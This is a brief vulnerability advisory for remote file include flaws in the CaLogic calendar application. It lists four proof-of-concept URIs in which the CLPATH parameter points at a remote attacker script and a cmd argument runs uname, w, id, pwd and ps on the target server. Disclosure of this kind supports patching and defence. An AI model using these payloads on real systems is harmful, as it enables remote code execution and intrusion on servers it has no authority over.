|
|
CaLogic Multiple Remote File Include Vulnerabilities
No exploit is required. The following proof of concept URI are available: http://www.example.com/calogic/cl_minical.php?CLPATH=http://www.example.com/.asc/.xpl/asc?&cmd=uname -a;w;id;pwd;ps http://www.example.com/calogic/clmcpreload.php?CLPATH=http://www.example.com/.asc/.xpl/asc?&cmd=uname -a;w;id;pwd;ps http://www.example.com/calogic/mcconfig.php?CLPATH=http://www.example.com/.asc/.xpl/asc?&cmd=uname -a;w;id;pwd;ps http://www.example.com/calogic/mcpi-demo.php?CLPATH=http://www.example.com/.asc/.xpl/asc?&cmd=uname -a;w;id;pwd;ps |
|
Privacy Statement |